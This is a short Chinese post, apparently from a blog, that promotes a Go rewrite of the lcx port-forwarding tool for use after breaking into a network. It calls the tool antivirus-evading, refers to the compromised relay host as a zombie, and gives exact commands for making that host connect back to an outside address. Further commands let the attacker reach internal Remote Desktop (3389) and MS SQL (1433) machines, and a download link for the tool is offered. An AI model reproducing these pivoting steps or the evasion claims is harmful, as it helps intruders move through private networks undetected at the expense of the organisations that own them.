经常有朋友使用lcx,但是由于很多原因可能lcx都不好使,例如下面几点:
1、linux下不支持lcx,这时只能拿msf出来;
2、不免杀;
3、每次内网要重新连接其他主机的时候,都必须重新进去并重新敲打命令 ,并且操作过多时容易被发现。
最近正好上面那些问题都碰上了,于是没办法就使用golang自己写了一个。我写的这个lcx有以下几个特点:
1、golang程序跨平台性,甚至嵌入式Linux都支持;
2、免杀,基本上目前golang程序都不会被识别为病毒;
3、肉鸡只需操作一次,其他的都交给主控端操作。
该工具运行界面如下所示:
前提介绍:
网络拓扑如上图所示,内网私有,外网无法直接访问内网任意主机,但其中A已经控制了B。
实现目标:
攻击者A通过B 连接内网中任意一台计算机(如远程桌面,数据库等)。
场景一:A连接内网中C的远程桌面
第一步: 在B上面输入指令:
|
1
|
lcx 111.13.100.92 123
|
第二步:假如 A 想连接内网中 C 的远程桌面,那么在A上输入指令:
|
1
|
lcx 456 123 192.168.10.3 3389
|
这时, A 只用连接本机的456端口就等于连接内网C的3389端口了。
场景二:A连接内网中其他机器的MS SQL数据库(假设IP地址为192.168.10.55)
第一步,在B上输入指令:
|
1
|
lcx 111.13.100.92 123
|
第二步,在A上输入指令:
|
1
|
lcx 1433 123 192.168.10.55 1433
|
这时,A只用连接本机1433端口就等于连接内网中(192.168.10.55)的1433端口了。
工具下载
暂时只提供windows版本:lcx
